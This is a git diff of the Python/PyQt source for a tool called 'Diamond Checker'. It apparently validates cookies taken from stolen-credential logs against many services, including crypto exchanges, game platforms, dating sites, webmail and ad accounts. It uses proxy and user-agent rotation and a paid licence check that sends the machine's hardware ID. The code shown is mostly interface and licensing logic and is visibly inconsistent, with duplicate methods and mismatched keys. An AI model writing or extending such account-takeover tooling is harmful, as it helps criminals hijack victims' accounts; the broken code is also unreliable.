int(self.ui.checkBox_freebitcoin.checkState()) + settings['services']['BATTLE'] = int(self.ui.checkBox_battlenet.checkState()) + settings['services']['AMAZON'] = int(self.ui.checkBox_amazon.checkState()) + settings['services']['HUMBLE'] = int(self.ui.checkBox_humble.checkState()) + settings['services']['KRYPTEX'] = int(self.ui.checkBox_kryptex.checkState()) + settings['services']['COINBASE'] = int(self.ui.checkBox_coinbase.checkState()) + settings['services']['PATHOFEXILE'] = int(self.ui.checkBox_pathofexile.checkState()) + settings['services']['HITBTC'] = int(self.ui.checkBox_hitbtc.checkState()) + settings['services']['TIKTOK'] = int(self.ui.checkBox_tiktok.checkState()) + settings['services']['YT'] = int(self.ui.checkBox_youtube.checkState()) + settings['services']['DISCORD'] = int(self.ui.checkBox_discord.checkState()) + settings['services']['VK'] = int(self.ui.checkBox_vk.checkState()) + settings['services']['FACEBOOK'] = int(self.ui.checkBox_facebook_ads.checkState()) + settings['services']['DISCORD'] = int(self.ui.checkBox_discord.checkState()) + settings['services']['SNAPCHATADS'] = int(self.ui.snapchat_ads_checkbox.checkState()) + settings['services']['MICROSOFTADS'] = int(self.ui.microsoft_ads_checkbox.checkState()) + settings['services']['TINDERADS'] = int(self.ui.tinder_ads_checkbox.checkState()) + settings['services']['TWITTERADS'] = int(self.ui.twitter_ads_checkbox.checkState()) + settings['services']['CRAIGSLISTADS'] = int(self.ui.craigslist_ads_checkbox.checkState()) + settings['services']['AIRBNB'] = int(self.ui.airbnb_checkbox.checkState()) + settings['services']['WALMART'] = int(self.ui.walmart_checkbox.checkState()) + settings['services']['UBEREATS'] = int(self.ui.uber_eats_checkbox.checkState()) + settings['services']['ZILLOW'] = int(self.ui.zillow_checkbox.checkState()) + settings['services']['FLIPKART'] = int(self.ui.flipkart_checkbox.checkState()) + settings['services']['DHGATE'] = int(self.ui.dh_gate_checkbox.checkState()) + settings['services']['INSTACART'] = int(self.ui.instacart_checkbox.checkState()) + settings['services']['ASHLEYMADISON'] = int(self.ui.ashley_madison_checkbox.checkState()) + settings['services']['ZOOSK'] = int(self.ui.zoosk_checkbox.checkState()) + settings['services']['CHRISTANMINGLE'] = int(self.ui.christan_mingle_checkbox.checkState()) + settings['services']['VINTED'] = int(self.ui.vinted_checkbox.checkState()) + settings['services']['BOOKING'] = int(self.ui.booking_checkbox.checkState()) + settings['services']['TEMU'] = int(self.ui.temu_checkbox.checkState()) + settings['services']['KICK'] = int(self.ui.kick_checkbox.checkState()) + settings['services']['MYSPACE'] = int(self.ui.myspace_checkbox.checkState()) + settings['services']['SNAPCHAT'] = int(self.ui.snapchat_ads_checkbox.checkState()) + settings['services']['TWITCH'] = int(self.ui.twitch_checkbox.checkState()) + settings['services']['LOCALS'] = int(self.ui.localsapp_checkbox.checkState()) + settings['services']['LINKEDIN'] = int(self.ui.linkedin_checkbox.checkState()) + settings['services']['HUMBLE'] = int(self.ui.checkBox_humble.checkState()) + + + Config().settings_write(settings) + + self.checking.start() + + def console(self, text): + self.ui.textEdit_console.append(text) + + def progres_set(self, all_cooks): + self.ui.progressBar.setRange(0, all_cooks) + + +class ConnectServerThread(QThread): + signal_check_login = pyqtSignal(str) + + def __init__(self): + QThread.__init__(self) + + def run(self): + try: + client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + client_sock.connect(('120.0.0.1', 5000)) # Replace with the correct IP address and port number + + data = json.dumps({"WHID": self.user_whid, "username": self.username}) + + client_sock.send(data.encode()) + data = client_sock.recv(4096) + data = data.decode() + self.signal_check_login.emit(data) + data = json.loads(data) + client_sock.close() + + except ConnectionResetError: + # Handle the connection reset error + error_message = "The connection was forcibly closed by the remote host." + self.signal_check_login.emit(json.dumps({"Donate": "0", "Messages": error_message})) + + except Exception as e: + # Handle other exceptions + error_message = f"An error occurred during the connection: {e}" + self.signal_check_login.emit(json.dumps({"Donate": "0", "Messages": error_message})) + + def init_args(self, user_whid, username): + self.user_whid = user_whid + self.username = username + + +class LoginCheckedGUI(QtWidgets.QMainWindow): + def __init__(self): + super(LoginCheckedGUI, self).__init__() + self.connect_server = ConnectServerThread() + self.ui = LoginCheked_UI.Ui_MainWindow() + self.ui.setupUi(self) + self.init_UI() + self.connect_server.signal_check_login.connect(self.openmessage) + + def init_UI(self): + self.setWindowTitle('Diamond Checker - Login') + self.setWindowIcon(QIcon('diamond.ico')) + self.ui.lineEdit.setText("Telegram login") + self.ui.pushButton.clicked.connect(self.check) + + def check(self): + settings = Config().settings_reader() + if settings["authorization"]["username"] == "": + settings["authorization"]["username"] = self.ui.lineEdit.text() + Config().settings_write(settings) + + user_whid = WMI().Win32_ComputerSystemProduct()[0].UUID + self.connect_server.init_args(user_whid, settings["authorization"]["username"]) + self.connect_server.start() + + # Check if the checkbox is checked + checkbox_state = self.ui.snapchat_checkbox.isChecked() + settings['services']['SNAPCHATADS'] = int(checkbox_state) + + + + def openmessage(self, data): + data = json.loads(data) + donat = data.get("Donat") + messages = data.get("Messages") + if donat == "1": + self.application2 = MainWindowChecker() + self.application2.show() + application.hide() + else: + settings = Config().settings_reader() + settings["authorization"]["username"] = "" + Config().settings_write(settings) + window_donat = QMessageBox() + window_donat.setWindowTitle("Status") + window_donat.setText(messages) + window_donat.setIcon(QMessageBox.Information) + window_donat.setStandardButtons(QMessageBox.Ok) + window_donat.exec_() + + + + def init_UI(self): + # Create a Skip button + self.skip_button = QtWidgets.QPushButton('Skip', self) + self.skip_button.clicked.connect(self.skip_login) + # Position the Skip button as needed + self.skip_button.setGeometry(10, 10, 100, 30) + + def skip_login(self): + # Implement the functionality to skip the login process + # For example, you can open the main application window directly + self.application2 = MainWindowChecker() + self.application2.show() + self.hide() + + +if __name__ == "__main__": + print("Do not close this window while the program is running\nDo not close this window while the program is running.") + app = QtWidgets.QApplication(sys.argv) + application = LoginCheckedGUI() + application.show() + + settings = Config().settings_reader() + if settings["authorization"]["username"] != "": + application.check() + + sys.exit(app.exec()) diff --git a/DiamondChecker/main_ui.py b/DiamondChecker/main_ui.py index 982c091..f4cf0a6 100644 --- a/DiamondChecker/main_ui.py +++ b/DiamondChecker/main_ui.py @@ -1,1092 +1,1092 @@ -# -*- coding: utf-8 -*- - -# Form implementation generated from reading ui file 'main_ui.ui' -# -# Created by: PyQt5 UI code generator 5.15.9 -# -# WARNING: Any manual changes made to this file will be lost when pyuic5 is -# run again. Do not edit this file unless you know what you are doing. - - -from PyQt5 import QtCore, QtGui, QtWidgets - - -class Ui_MainWindow(object): - def setupUi(self, MainWindow): - MainWindow.setObjectName("MainWindow") - MainWindow.resize(801, 820) - MainWindow.setMinimumSize(QtCore.QSize(801, 677)) - MainWindow.setMaximumSize(QtCore.QSize(801, 999)) - MainWindow.setSizeIncrement(QtCore.QSize(801, 677)) - MainWindow.setBaseSize(QtCore.QSize(801, 677)) - MainWindow.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.centralwidget = QtWidgets.QWidget(MainWindow) - self.centralwidget.setObjectName("centralwidget") - self.lineEdit_dir = QtWidgets.QLineEdit(self.centralwidget) - self.lineEdit_dir.setGeometry(QtCore.QRect(10, 280, 421, 31)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.lineEdit_dir.setFont(font) - self.lineEdit_dir.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.lineEdit_dir.setObjectName("lineEdit_dir") - self.lineEdit_proxy = QtWidgets.QLineEdit(self.centralwidget) - self.lineEdit_proxy.setGeometry(QtCore.QRect(10, 320, 331, 31)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.lineEdit_proxy.setFont(font) - self.lineEdit_proxy.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.lineEdit_proxy.setObjectName("lineEdit_proxy") - self.lineEdit_ua = QtWidgets.QLineEdit(self.centralwidget) - self.lineEdit_ua.setGeometry(QtCore.QRect(10, 360, 331, 31)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.lineEdit_ua.setFont(font) - self.lineEdit_ua.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.lineEdit_ua.setObjectName("lineEdit_ua") - self.checkBox_ua = QtWidgets.QCheckBox(self.centralwidget) - self.checkBox_ua.setGeometry(QtCore.QRect(440, 360, 81, 31)) - font = QtGui.QFont() - font.setFamily("MS Shell Dlg 2") - font.setPointSize(9) - font.setBold(True) - self.checkBox_ua.setFont(font) - self.checkBox_ua.setStyleSheet("color: #c8c8c8") - self.checkBox_ua.setObjectName("checkBox_ua") - self.label_2 = QtWidgets.QLabel(self.centralwidget) - self.label_2.setGeometry(QtCore.QRect(10, 740, 601, 51)) - self.label_2.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.label_2.setText("") - self.label_2.setObjectName("label_2") - self.pushButton = QtWidgets.QPushButton(self.centralwidget) - self.pushButton.setGeometry(QtCore.QRect(620, 740, 171, 51)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(12) - self.pushButton.setFont(font) - self.pushButton.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.pushButton.setObjectName("pushButton") - self.progressBar = QtWidgets.QProgressBar(self.centralwidget) - self.progressBar.setGeometry(QtCore.QRect(180, 750, 421, 31)) - self.progressBar.setStyleSheet("background-color: #181818;\n" -"border: 3px solid #363636;\n" -"color: #c8c8c8") - self.progressBar.setProperty("value", 24) - self.progressBar.setTextVisible(False) - self.progressBar.setOrientation(QtCore.Qt.Horizontal) - self.progressBar.setInvertedAppearance(False) - self.progressBar.setObjectName("progressBar") - self.pushButton_dir_logs = QtWidgets.QPushButton(self.centralwidget) - self.pushButton_dir_logs.setGeometry(QtCore.QRect(430, 280, 91, 31)) - self.pushButton_dir_logs.setStyleSheet("") - self.pushButton_dir_logs.setObjectName("pushButton_dir_logs") - self.pushButton_proxies_files = QtWidgets.QPushButton(self.centralwidget) - self.pushButton_proxies_files.setGeometry(QtCore.QRect(340, 320, 91, 31)) - self.pushButton_proxies_files.setStyleSheet("") - self.pushButton_proxies_files.setObjectName("pushButton_proxies_files") - self.pushButton_useragents_file = QtWidgets.QPushButton(self.centralwidget) - self.pushButton_useragents_file.setGeometry(QtCore.QRect(340, 360, 91, 31)) - self.pushButton_useragents_file.setStyleSheet("") - self.pushButton_useragents_file.setObjectName("pushButton_useragents_file") - self.textEdit_console = QtWidgets.QTextEdit(self.centralwidget) - self.textEdit_console.setGeometry(QtCore.QRect(10, 20, 781, 251)) - self.textEdit_console.setStyleSheet("background-color: #181818;\n" -"border: 3px solid #363636;\n" -"color: #c8c8c8") - self.textEdit_console.setObjectName("textEdit_console") - self.social_network_label = QtWidgets.QLabel(self.centralwidget) - self.social_network_label.setGeometry(QtCore.QRect(10, 740, 161, 51)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.social_network_label.setFont(font) - self.social_network_label.setStyleSheet("") - self.social_network_label.setObjectName("social_network_label") - self.spinBox_thr = QtWidgets.QSpinBox(self.centralwidget) - self.spinBox_thr.setGeometry(QtCore.QRect(90, 750, 71, 31)) - font = QtGui.QFont() - font.setFamily("Impact") - font.setPointSize(10) - self.spinBox_thr.setFont(font) - self.spinBox_thr.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.spinBox_thr.setObjectName("spinBox_thr") - self.label_lgbt = QtWidgets.QLabel(self.centralwidget) - self.label_lgbt.setGeometry(QtCore.QRect(0, 0, 801, 5)) - self.label_lgbt.setText("") - self.label_lgbt.setScaledContents(True) - self.label_lgbt.setObjectName("label_lgbt") - self.comboBox_proxy = QtWidgets.QComboBox(self.centralwidget) - self.comboBox_proxy.setGeometry(QtCore.QRect(440, 320, 71, 21)) - font = QtGui.QFont() - font.setFamily("MS Sans Serif") - font.setPointSize(10) - self.comboBox_proxy.setFont(font) - self.comboBox_proxy.setStyleSheet("") - self.comboBox_proxy.setObjectName("comboBox_proxy") - self.comboBox_proxy.addItem("") - self.comboBox_proxy.addItem("") - self.comboBox_proxy.addItem("") - self.comboBox_proxy.addItem("") - self.stats_box = QtWidgets.QLabel(self.centralwidget) - self.stats_box.setGeometry(QtCore.QRect(530, 280, 261, 131)) - font = QtGui.QFont() - font.setFamily("Impact") - font.setPointSize(12) - self.stats_box.setFont(font) - self.stats_box.setStyleSheet("") - self.stats_box.setText("") - self.stats_box.setObjectName("stats_box") - self.inbox_tab_widget = QtWidgets.QTabWidget(self.centralwidget) - self.inbox_tab_widget.setGeometry(QtCore.QRect(10, 430, 781, 281)) - font = QtGui.QFont() - font.setFamily("Furore") - self.inbox_tab_widget.setFont(font) - self.inbox_tab_widget.setFocusPolicy(QtCore.Qt.TabFocus) - self.inbox_tab_widget.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu) - self.inbox_tab_widget.setAutoFillBackground(False) - self.inbox_tab_widget.setStyleSheet("QTabWidget::pane { /* The tab widget frame */\n" -" border-top: 2px solid #000000;\n" -" position: absolute;\n" -" top: -0.5em;\n" -"}\n" -"\n" -"QTabWidget::tab-bar {\n" -" alignment: center;\n" -"}\n" -"\n" -"/* Style the tab using the tab sub-control. Note that\n" -" it reads QTabBar _not_ QTabWidget */\n" -"QTabBar::tab {\n" -" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n" -" stop: 0 #000000, stop: 0.4 #000000,\n" -" stop: 0.5 #000000, stop: 1.0 #000000);\n" -" border: 2px solid ;\n" -" selection-color: rgb(15, 255, 167);\n" -" border-bottom-color: #000000; /* same as the pane color */\n" -" border-top-left-radius: 12px;\n" -" border-top-right-radius: 12px;\n" -" min-width: 8ex;\n" -" padding: 8px;\n" -"}\n" -"\n" -"QTabBar::tab:selected, QTabBar::tab:hover {\n" -" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n" -" stop: 0 #000000, stop: 0.4 #000000,\n" -" stop: 0.5 #000000, stop: 1.0 #000000);\n" -"}\n" -"\n" -"QTabBar::tab:selected {\n" -" border-color: #00def2;\n" -" border-bottom-color: #00def2; /* same as pane color */\n" -"}") - self.inbox_tab_widget.setTabPosition(QtWidgets.QTabWidget.North) - self.inbox_tab_widget.setTabShape(QtWidgets.QTabWidget.Rounded) - self.inbox_tab_widget.setElideMode(QtCore.Qt.ElideNone) - self.inbox_tab_widget.setMovable(False) - self.inbox_tab_widget.setTabBarAutoHide(False) - self.inbox_tab_widget.setObjectName("inbox_tab_widget") - self.inbox_tab = QtWidgets.QWidget() - self.inbox_tab.setObjectName("inbox_tab") - self.widget = QtWidgets.QWidget(self.inbox_tab) - self.widget.setGeometry(QtCore.QRect(9, 10, 761, 221)) - self.widget.setObjectName("widget") - self.inbox_checkbox_gridlayout = QtWidgets.QGridLayout(self.widget) - self.inbox_checkbox_gridlayout.setContentsMargins(0, 0, 0, 0) - self.inbox_checkbox_gridlayout.setObjectName("inbox_checkbox_gridlayout") - self.gmail_inbox_checkbox = QtWidgets.QCheckBox(self.widget) - self.gmail_inbox_checkbox.setEnabled(False) - self.gmail_inbox_checkbox.setObjectName("gmail_inbox_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.gmail_inbox_checkbox, 0, 0, 1, 1) - self.yandex_checkbox = QtWidgets.QCheckBox(self.widget) - self.yandex_checkbox.setEnabled(False) - self.yandex_checkbox.setObjectName("yandex_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.yandex_checkbox, 0, 1, 1, 1) - self.yahoo_checkbox = QtWidgets.QCheckBox(self.widget) - self.yahoo_checkbox.setEnabled(False) - self.yahoo_checkbox.setObjectName("yahoo_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.yahoo_checkbox, 1, 0, 1, 1) - self.outlook_checkbox = QtWidgets.QCheckBox(self.widget) - self.outlook_checkbox.setEnabled(False) - self.outlook_checkbox.setObjectName("outlook_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.outlook_checkbox, 1, 1, 1, 1) - self.webmail_checkbox = QtWidgets.QCheckBox(self.widget) - self.webmail_checkbox.setEnabled(False) - self.webmail_checkbox.setObjectName("webmail_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.webmail_checkbox, 2, 0, 1, 1) - self.mailru_checkbox = QtWidgets.QCheckBox(self.widget) - self.mailru_checkbox.setEnabled(False) - self.mailru_checkbox.setObjectName("mailru_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.mailru_checkbox, 2, 1, 1, 1) - self.cpanel_checkbox = QtWidgets.QCheckBox(self.widget) - self.cpanel_checkbox.setEnabled(False) - self.cpanel_checkbox.setObjectName("cpanel_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.cpanel_checkbox, 3, 0, 1, 1) - self.office_checkbox = QtWidgets.QCheckBox(self.widget) - self.office_checkbox.setEnabled(False) - self.office_checkbox.setObjectName("office_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.office_checkbox, 3, 1, 1, 1) - self.inbox_tab_widget.addTab(self.inbox_tab, "") - self.ads_tab = QtWidgets.QWidget() - self.ads_tab.setObjectName("ads_tab") - self.widget1 = QtWidgets.QWidget(self.ads_tab) - self.widget1.setGeometry(QtCore.QRect(10, 10, 761, 211)) - self.widget1.setObjectName("widget1") - self.gridLayout_3 = QtWidgets.QGridLayout(self.widget1) - self.gridLayout_3.setContentsMargins(0, 0, 0, 0) - self.gridLayout_3.setObjectName("gridLayout_3") - self.bing_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.bing_ads_checkbox.setEnabled(False) - self.bing_ads_checkbox.setObjectName("bing_ads_checkbox") - self.gridLayout_3.addWidget(self.bing_ads_checkbox, 0, 0, 1, 1) - self.reddit_ads__checkbox = QtWidgets.QCheckBox(self.widget1) - self.reddit_ads__checkbox.setEnabled(False) - self.reddit_ads__checkbox.setObjectName("reddit_ads__checkbox") - self.gridLayout_3.addWidget(self.reddit_ads__checkbox, 0, 1, 1, 1) - self.ahref_checkbox = QtWidgets.QCheckBox(self.widget1) - self.ahref_checkbox.setEnabled(False) - self.ahref_checkbox.setObjectName("ahref_checkbox") - self.gridLayout_3.addWidget(self.ahref_checkbox, 0, 2, 1, 1) - self.snapchat_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.snapchat_ads_checkbox.setEnabled(False) - self.snapchat_ads_checkbox.setObjectName("snapchat_ads_checkbox") - self.gridLayout_3.addWidget(self.snapchat_ads_checkbox, 1, 0, 1, 1) - self.tinder_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.tinder_ads_checkbox.setEnabled(False) - self.tinder_ads_checkbox.setObjectName("tinder_ads_checkbox") - self.gridLayout_3.addWidget(self.tinder_ads_checkbox, 1, 1, 1, 1) - self.twitter_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.twitter_ads_checkbox.setEnabled(False) - self.twitter_ads_checkbox.setObjectName("twitter_ads_checkbox") - self.gridLayout_3.addWidget(self.twitter_ads_checkbox, 1, 2, 1, 1) - self.sem_rush_checkbox = QtWidgets.QCheckBox(self.widget1) - self.sem_rush_checkbox.setEnabled(False) - self.sem_rush_checkbox.setObjectName("sem_rush_checkbox") - self.gridLayout_3.addWidget(self.sem_rush_checkbox, 2, 0, 1, 1) - self.craigslist_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.craigslist_ads_checkbox.setEnabled(False) - self.craigslist_ads_checkbox.setObjectName("craigslist_ads_checkbox") - self.gridLayout_3.addWidget(self.craigslist_ads_checkbox, 3, 0, 1, 1) - self.facebookads__checkbox = QtWidgets.QCheckBox(self.widget1) - self.facebookads__checkbox.setObjectName("facebookads__checkbox") - self.gridLayout_3.addWidget(self.facebookads__checkbox, 3, 1, 1, 1) - self.microsoft_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.microsoft_ads_checkbox.setEnabled(False) - self.microsoft_ads_checkbox.setObjectName("microsoft_ads_checkbox") - self.gridLayout_3.addWidget(self.microsoft_ads_checkbox, 2, 2, 1, 1) - self.inbox_tab_widget.addTab(self.ads_tab, "") - self.game_tab = QtWidgets.QWidget() - self.game_tab.setObjectName("game_tab") - self.widget2 = QtWidgets.QWidget(self.game_tab) - self.widget2.setGeometry(QtCore.QRect(10, 10, 761, 201)) - self.widget2.setObjectName("widget2") - self.game_checkbox_gridlayout = QtWidgets.QGridLayout(self.widget2) - self.game_checkbox_gridlayout.setContentsMargins(0, 0, 0, 0) - self.game_checkbox_gridlayout.setObjectName("game_checkbox_gridlayout") - self.checkBox_steam = QtWidgets.QCheckBox(self.widget2) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_steam.setFont(font) - self.checkBox_steam.setStyleSheet("") - self.checkBox_steam.setObjectName("checkBox_steam") - self.game_checkbox_gridlayout.addWidget(self.checkBox_steam, 0, 0, 1, 1) - self.checkBox_pathofexile = QtWidgets.QCheckBox(self.widget2) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_pathofexile.setFont(font) - self.checkBox_pathofexile.setStyleSheet("") - self.checkBox_pathofexile.setObjectName("checkBox_pathofexile") - self.game_checkbox_gridlayout.addWidget(self.checkBox_pathofexile, 0, 1, 1, 1) - self.checkBox_roblox = QtWidgets.QCheckBox(self.widget2) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_roblox.setFont(font) - self.checkBox_roblox.setStyleSheet("") - self.checkBox_roblox.setObjectName("checkBox_roblox") - self.game_checkbox_gridlayout.addWidget(self.checkBox_roblox, 1, 0, 1, 1) - self.checkBox_battlenet = QtWidgets.QCheckBox(self.widget2) - font = 